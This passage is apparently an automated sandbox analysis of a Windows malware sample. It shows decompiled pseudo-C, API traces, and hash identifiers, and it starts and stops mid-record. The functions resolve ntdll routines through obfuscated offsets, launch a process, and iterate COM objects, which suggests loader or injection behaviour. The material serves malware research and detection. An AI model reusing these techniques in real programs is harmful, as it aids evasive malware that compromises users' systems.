                                                            • Part of subcall function 005E1BB6: lstrlen.KERNEL32(?,?,?,005E20C2,?,016695B0), ref: 005E1BE9
                                                            • Part of subcall function 005E1BB6: strcpy.NTDLL ref: 005E1C00
                                                            • Part of subcall function 005E1BB6: lstrcat.KERNEL32(00000000,?), ref: 005E1C0B
                                                            • Part of subcall function 005E1BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,005E20C2,?,016695B0), ref: 005E1C28
                                                          • StrTrimA.SHLWAPI(00000000,005EC28C,?,016695B0), ref: 005E20E1
                                                            • Part of subcall function 005E361A: lstrlen.KERNEL32(01669A78,00000000,00000000,7742C740,005E20ED,00000000), ref: 005E362A
                                                            • Part of subcall function 005E361A: lstrlen.KERNEL32(?), ref: 005E3632
                                                            • Part of subcall function 005E361A: lstrcpy.KERNEL32(00000000,01669A78), ref: 005E3646
                                                            • Part of subcall function 005E361A: lstrcat.KERNEL32(00000000,?), ref: 005E3651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 005E2100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005E2107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 005E2114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 005E2118
                                                            • Part of subcall function 005E6777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 005E6829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 005E2148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 005E2157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,016695B0), ref: 005E2166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 005E2178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 005E2187
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: 555e98fe2af4278fb8baae85627ba02bccf308ac523be135019d747a0da82d13
                                                          • Instruction ID: 782eb0810eea82271615d5bd39fd9b561a4f5e1d2eabf99e730ca008282f2d4f
                                                          • Opcode Fuzzy Hash: 555e98fe2af4278fb8baae85627ba02bccf308ac523be135019d747a0da82d13
                                                          • Instruction Fuzzy Hash: 4061AC31500281AFC7199B65EC89E5A7BB9FB58350F040514FAC4DF270EB35E80AEB76
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E005E8EA1(void* __eax, void* __ecx) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				long _v32;
                                                          				void _v104;
                                                          				char _v108;
                                                          				long _t36;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t47;
                                                          				intOrPtr _t50;
                                                          				void* _t58;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t71;
                                                          
                                                          				_t69 =  *((intOrPtr*)(__eax + 0x14));
                                                          				_t36 = E005E592D(__ecx,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x14)) + 0xc)),  &_v12,  &_v16);
                                                          				_v8 = _t36;
                                                          				if(_t36 != 0) {
                                                          					L12:
                                                          					return _v8;
                                                          				}
                                                          				E005EA749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                          				_t40 = _v12(_v12);
                                                          				_v8 = _t40;
                                                          				if(_t40 == 0 && ( *0x5ed260 & 0x00000001) != 0) {
                                                          					_v32 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v108 = 0;
                                                          					memset( &_v104, 0, 0x40);
                                                          					_t47 =  *0x5ed2a8; // 0x107a5a8
                                                          					_t18 = _t47 + 0x5ee3e6; // 0x73797325
                                                          					_t68 = E005E3C48(_t18);
                                                          					if(_t68 == 0) {
                                                          						_v8 = 8;
                                                          					} else {
                                                          						_t50 =  *0x5ed2a8; // 0x107a5a8
                                                          						_t19 = _t50 + 0x5ee747; // 0x1668cef
                                                          						_t20 = _t50 + 0x5ee0af; // 0x4e52454b
                                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                          						if(_t71 == 0) {
                                                          							_v8 = 0x7f;
                                                          						} else {
                                                          							_v108 = 0x44;
                                                          							E005EA62D();
                                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                          							_push(1);
                                                          							E005EA62D();
                                                          							if(_t58 == 0) {
                                                          								_v8 = GetLastError();
                                                          							} else {
                                                          								CloseHandle(_v28);
                                                          								CloseHandle(_v32);
                                                          							}
                                                          						}
                                                          						HeapFree( *0x5ed238, 0, _t68);
                                                          					}
                                                          				}
                                                          				_t70 = _v16;
                                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                          				E005EA734(_t70);
                                                          				goto L12;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 005E592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,?,00000000,?,?,?,005E8EBD,?,00000001,?,?,00000000,00000000), ref: 005E5952
                                                            • Part of subcall function 005E592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 005E5974
                                                            • Part of subcall function 005E592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 005E598A
                                                            • Part of subcall function 005E592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 005E59A0
                                                            • Part of subcall function 005E592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 005E59B6
                                                            • Part of subcall function 005E592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 005E59CC
                                                          • memset.NTDLL ref: 005E8F0B
                                                            • Part of subcall function 005E3C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,005E8F24,73797325), ref: 005E3C59
                                                            • Part of subcall function 005E3C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 005E3C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,01668CEF,73797325), ref: 005E8F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 005E8F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 005E8FB0
                                                            • Part of subcall function 005EA62D: GetProcAddress.KERNEL32(36776F57,005EA2D4), ref: 005EA648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 005E8F8D
                                                          • CloseHandle.KERNEL32(?), ref: 005E8F92
                                                          • GetLastError.KERNEL32(00000001), ref: 005E8F96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID: `7^
                                                          • API String ID: 3075724336-2873282293
                                                          • Opcode ID: 61ae2c7946e7ccaaa03caaa5323999caed9d5e8a2c53b411743dc0d982b5fa18
                                                          • Instruction ID: 36b31ca5cf7f455d87fbbade631f48c49410c22ffc367243f915cbf022b3771e
                                                          • Opcode Fuzzy Hash: 61ae2c7946e7ccaaa03caaa5323999caed9d5e8a2c53b411743dc0d982b5fa18
                                                          • Instruction Fuzzy Hash: F3317FB5C00249EFDB18AFA5CC889AEBFB9FB44304F100465F695A7121D734AE49DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 27%
                                                          			E005E6C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				long _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _v24;
                                                          				void* __esi;
                                                          				long _t43;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				intOrPtr _t66;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          				void* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr _t91;
                                                          
                                                          				_t79 =  *0x5ed33c; // 0x1669798
                                                          				_v24 = 8;
                                                          				_t43 = GetTickCount();
                                                          				_push(5);
                                                          				_t74 = 0xa;
                                                          				_v16 = _t43;
                                                          				_t44 = E005EA557(_t74,  &_v16);
                                                          				_v8 = _t44;
                                                          				if(_t44 == 0) {
                                                          					_v8 = 0x5ec18c;
                                                          				}
                                                          				_t46 = E005E18A5(_t79);
                                                          				_v12 = _t46;
                                                          				if(_t46 != 0) {
                                                          					_t80 = __imp__;
                                                          					_t48 =  *_t80(_v8, _t71);
                                                          					_t49 =  *_t80(_v12);
                                                          					_t50 =  *_t80(_a4);
                                                          					_t54 = E005EA71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                          					_v20 = _t54;
                                                          					if(_t54 != 0) {
                                                          						_t75 =  *0x5ed2a8; // 0x107a5a8
                                                          						_t16 = _t75 + 0x5eeb08; // 0x530025
                                                          						 *0x5ed118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                          						_push(4);
                                                          						_t77 = 5;
                                                          						_t57 = E005EA557(_t77,  &_v16);
                                                          						_v8 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_v8 = 0x5ec190;
                                                          						}
                                                          						_t58 =  *_t80(_v8);
                                                          						_t59 =  *_t80(_v12);
                                                          						_t60 =  *_t80(_a4);
                                                          						_t91 = E005EA71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                          						if(_t91 == 0) {
                                                          							E005EA734(_v20);
                                                          						} else {
                                                          							_t66 =  *0x5ed2a8; // 0x107a5a8
                                                          							_t31 = _t66 + 0x5eec28; // 0x73006d
                                                          							 *0x5ed118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                          							 *_a16 = _v20;
                                                          							_v24 = _v24 & 0x00000000;
                                                          							 *_a20 = _t91;
                                                          						}
                                                          					}
                                                          					E005EA734(_v12);
                                                          				}
                                                          				return _v24;
                                                          			}

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 005E6C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 005E6C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 005E6C96
                                                          • lstrlen.KERNEL32(00000000), ref: 005E6C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 005E6CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 005E6D0A
                                                          • lstrlen.KERNEL32(?), ref: 005E6D13
                                                          • lstrlen.KERNEL32(?), ref: 005E6D1A
                                                          • lstrlenW.KERNEL32(?), ref: 005E6D21
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 56625aea8bea74919c283ecb2abdcdc482421988905d2ef7829c658a23b652ac
                                                          • Instruction ID: d795ece9aba2a70c32af5b5c331287733af4718ad286df52aa3fb0ff19de1f9c
                                                          • Opcode Fuzzy Hash: 56625aea8bea74919c283ecb2abdcdc482421988905d2ef7829c658a23b652ac
                                                          • Instruction Fuzzy Hash: A1419A72D0024AFBCF19AFA5CC4999EBFB5FF54354F010090E944AB221DB35EA54EBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 63%
                                                          			E005E1BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t13;
                                                          				char* _t28;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				char* _t36;
                                                          				intOrPtr* _t40;
                                                          				char* _t41;
                                                          				char* _t42;
                                                          				char* _t43;
                                                          
                                                          				_t34 = __edx;
                                                          				_push(__ecx);
                                                          				_t9 =  *0x5ed2a8; // 0x107a5a8
                                                          				_t1 = _t9 + 0x5ee62c; // 0x253d7325
                                                          				_t36 = 0;
                                                          				_t28 = E005E173D(__ecx, _t1);
                                                          				if(_t28 != 0) {
                                                          					_t40 = __imp__;
                                                          					_t13 =  *_t40(_t28);
                                                          					_v8 = _t13;
                                                          					_t41 = E005EA71F(_v8 +  *_t40(_a4) + 1);
                                                          					if(_t41 != 0) {
                                                          						strcpy(_t41, _t28);
                                                          						_pop(_t33);
                                                          						__imp__(_t41, _a4);
                                                          						_t36 = E005E64EF(_t34, _t41, _a8);
                                                          						E005EA734(_t41);
                                                          						_t42 = E005E6467(StrTrimA(_t36, "="), _t36);
                                                          						if(_t42 != 0) {
                                                          							E005EA734(_t36);
                                                          							_t36 = _t42;
                                                          						}
                                                          						_t43 = E005E17E5(_t36, _t33);
                                                          						if(_t43 != 0) {
                                                          							E005EA734(_t36);
                                                          							_t36 = _t43;
                                                          						}
                                                          					}
                                                          					E005EA734(_t28);
                                                          				}
                                                          				return _t36;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 005E173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,005E1BD0,253D7325,00000000,00000000,7742C740,?,?,005E20C2,?), ref: 005E17A4
                                                            • Part of subcall function 005E173D: sprintf.NTDLL ref: 005E17C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,005E20C2,?,016695B0), ref: 005E1BE1
                                                          • lstrlen.KERNEL32(?,?,?,005E20C2,?,016695B0), ref: 005E1BE9
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • strcpy.NTDLL ref: 005E1C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 005E1C0B
                                                            • Part of subcall function 005E64EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,005E1C1A,00000000,?,?,?,005E20C2,?,016695B0), ref: 005E6506
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,005E20C2,?,016695B0), ref: 005E1C28
                                                            • Part of subcall function 005E6467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,005E1C34,00000000,?,?,005E20C2,?,016695B0), ref: 005E6471
                                                            • Part of subcall function 005E6467: _snprintf.NTDLL ref: 005E64CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: cbae2e66c64b0f25aba2284e2243831bccd8f9542ccd739a94b3c8fa533c7e71
                                                          • Instruction ID: 43d2e846c609ff15f1a4b607ad1620d7c99d04a763819630069a637bb8086e4d
                                                          • Opcode Fuzzy Hash: cbae2e66c64b0f25aba2284e2243831bccd8f9542ccd739a94b3c8fa533c7e71
                                                          • Instruction Fuzzy Hash: 251123375016A6678A1EBBB69C8DC6E3EADFE957603150015F6849B101CE38DC0697A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 005E68EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 005E68FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 005E6911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E6979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E6988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E6993
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 94a37dab6bb620de6009b73f3ce754b3aaaa2b298caf9c37b917d2c7a8535190
                                                          • Instruction ID: c9ce2d5cd533ee847716e363bc0d2fa4b31674a52329ff270f394329a04be1db
                                                          • Opcode Fuzzy Hash: 94a37dab6bb620de6009b73f3ce754b3aaaa2b298caf9c37b917d2c7a8535190
                                                          • Instruction Fuzzy Hash: 2241A036D00649AFDB05DFB9D848A9FBBBAFF88340F144425E950EB220DA71ED05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E005E592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				intOrPtr _t30;
                                                          				_Unknown_base(*)()* _t32;
                                                          				intOrPtr _t33;
                                                          				_Unknown_base(*)()* _t35;
                                                          				intOrPtr _t36;
                                                          				_Unknown_base(*)()* _t38;
                                                          				intOrPtr _t39;
                                                          				_Unknown_base(*)()* _t41;
                                                          				intOrPtr _t44;
                                                          				struct HINSTANCE__* _t48;
                                                          				intOrPtr _t54;
                                                          
                                                          				_t54 = E005EA71F(0x20);
                                                          				if(_t54 == 0) {
                                                          					_v8 = 8;
                                                          				} else {
                                                          					_t23 =  *0x5ed2a8; // 0x107a5a8
                                                          					_t1 = _t23 + 0x5ee11a; // 0x4c44544e
                                                          					_t48 = GetModuleHandleA(_t1);
                                                          					_t26 =  *0x5ed2a8; // 0x107a5a8
                                                          					_t2 = _t26 + 0x5ee769; // 0x7243775a
                                                          					_v8 = 0x7f;
                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                          					 *(_t54 + 0xc) = _t28;
                                                          					if(_t28 == 0) {
                                                          						L8:
                                                          						E005EA734(_t54);
                                                          					} else {
                                                          						_t30 =  *0x5ed2a8; // 0x107a5a8
                                                          						_t5 = _t30 + 0x5ee756; // 0x614d775a
                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                          						 *(_t54 + 0x10) = _t32;
                                                          						if(_t32 == 0) {
                                                          							goto L8;
                                                          						} else {
                                                          							_t33 =  *0x5ed2a8; // 0x107a5a8
                                                          							_t7 = _t33 + 0x5ee40b; // 0x6e55775a
                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                          							 *(_t54 + 0x14) = _t35;
                                                          							if(_t35 == 0) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t36 =  *0x5ed2a8; // 0x107a5a8
                                                          								_t9 = _t36 + 0x5ee4d2; // 0x4e6c7452
                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                          								 *(_t54 + 0x18) = _t38;
                                                          								if(_t38 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									_t39 =  *0x5ed2a8; // 0x107a5a8
                                                          									_t11 = _t39 + 0x5ee779; // 0x6c43775a
                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                          									 *(_t54 + 0x1c) = _t41;
                                                          									if(_t41 == 0) {
                                                          										goto L8;
                                                          									} else {
                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                          										_t44 = E005E6604(_t54, _a8);
                                                          										_v8 = _t44;
                                                          										if(_t44 != 0) {
                                                          											goto L8;
                                                          										} else {
                                                          											 *_a12 = _t54;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}



















                                                          APIs
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,?,00000000,?,?,?,005E8EBD,?,00000001,?,?,00000000,00000000), ref: 005E5952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 005E5974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 005E598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 005E59A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 005E59B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 005E59CC
                                                            • Part of subcall function 005E6604: memset.NTDLL ref: 005E6683
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: d3cff721378755ae6a42eafd13756e686eeb5151de93043e5f26e513b456a934
                                                          • Instruction ID: 0e05c616468c014e2cabfedbd52e6a9d53727a85e42930ed9308489df63252b0
                                                          • Opcode Fuzzy Hash: d3cff721378755ae6a42eafd13756e686eeb5151de93043e5f26e513b456a934
                                                          • Instruction Fuzzy Hash: A0216BB450068AEFD728EF6ACC84D6ABBFCFF243447054166E585CB221E634E909CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 49%
                                                          			E005E6F3A(intOrPtr* __eax) {
                                                          				char _v8;
                                                          				WCHAR* _v12;
                                                          				void* _v16;
                                                          				char _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v32;
                                                          				intOrPtr _v40;
                                                          				short _v48;
                                                          				intOrPtr _v56;
                                                          				short _v64;
                                                          				intOrPtr* _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t57;
                                                          				intOrPtr* _t58;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				short _t67;
                                                          				intOrPtr* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t72;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t87;
                                                          				intOrPtr _t103;
                                                          				intOrPtr _t109;
                                                          				void* _t118;
                                                          				void* _t122;
                                                          				void* _t123;
                                                          				intOrPtr _t130;
                                                          
                                                          				_t123 = _t122 - 0x3c;
                                                          				_t1 =  &_v8; // 0x5e3a2e
                                                          				_push(__eax);
                                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                          				if(_t118 >= 0) {
                                                          					_t3 =  &_v8; // 0x5e3a2e
                                                          					_t54 =  *_t3;
                                                          					_t103 =  *0x5ed2a8; // 0x107a5a8
                                                          					_t5 = _t103 + 0x5ee038; // 0x3050f485
                                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                          					_t6 =  &_v8; // 0x5e3a2e
                                                          					_t56 =  *_t6;
                                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                          					if(_t118 >= 0) {
                                                          						__imp__#2(0x5ec290);
                                                          						_v28 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_t118 = 0x8007000e;
                                                          						} else {
                                                          							_t60 = _v32;
                                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                          							_t87 = __imp__#6;
                                                          							_t118 = _t61;
                                                          							if(_t118 >= 0) {
                                                          								_t63 = _v24;
                                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                          								if(_t118 >= 0) {
                                                          									_t130 = _v20;
                                                          									if(_t130 != 0) {
                                                          										_t67 = 3;
                                                          										_v64 = _t67;
                                                          										_v48 = _t67;
                                                          										_v56 = 0;
                                                          										_v40 = 0;
                                                          										if(_t130 > 0) {
                                                          											while(1) {
                                                          												_t21 =  &_v8; // 0x5e3a2e
                                                          												_t68 = _v24;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t123 = _t123;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68, _t21);
                                                          												if(_t118 < 0) {
                                                          													goto L16;
                                                          												}
                                                          												_t26 =  &_v8; // 0x5e3a2e
                                                          												_t70 =  *_t26;
                                                          												_t109 =  *0x5ed2a8; // 0x107a5a8
                                                          												_t28 = _t109 + 0x5ee0bc; // 0x3050f1ff
                                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                          												if(_t118 >= 0) {
                                                          													_t75 = _v16;
                                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                          														_t79 =  *0x5ed2a8; // 0x107a5a8
                                                          														_t33 = _t79 + 0x5ee078; // 0x76006f
                                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                                          															_t83 = _v16;
                                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                          														}
                                                          														 *_t87(_v12);
                                                          													}
                                                          													_t77 = _v16;
                                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                          												}
                                                          												_t40 =  &_v8; // 0x5e3a2e
                                                          												_t72 =  *_t40;
                                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                          												_v40 = _v40 + 1;
                                                          												if(_v40 < _v20) {
                                                          													continue;
                                                          												}
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								L16:
                                                          								_t65 = _v24;
                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          							}
                                                          							 *_t87(_v28);
                                                          						}
                                                          						_t58 = _v32;
                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                          					}
                                                          				}
                                                          				return _t118;
                                                          			}






































                                                          APIs
                                                          • SysAllocString.OLEAUT32(005EC290), ref: 005E6F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 005E706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E7084
                                                          • SysFreeString.OLEAUT32(?), ref: 005E70B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID: .:^
                                                          • API String ID: 1885612795-1692930162
                                                          • Opcode ID: dc5f30ae1297a4ec7e8df64686465041612b7554106c3bdc7b0786697b1c5fdc
                                                          • Instruction ID: f42b598da8dd8c0b1533ac443b639c8e56d2a58914101e29fef9f5ecb2301242
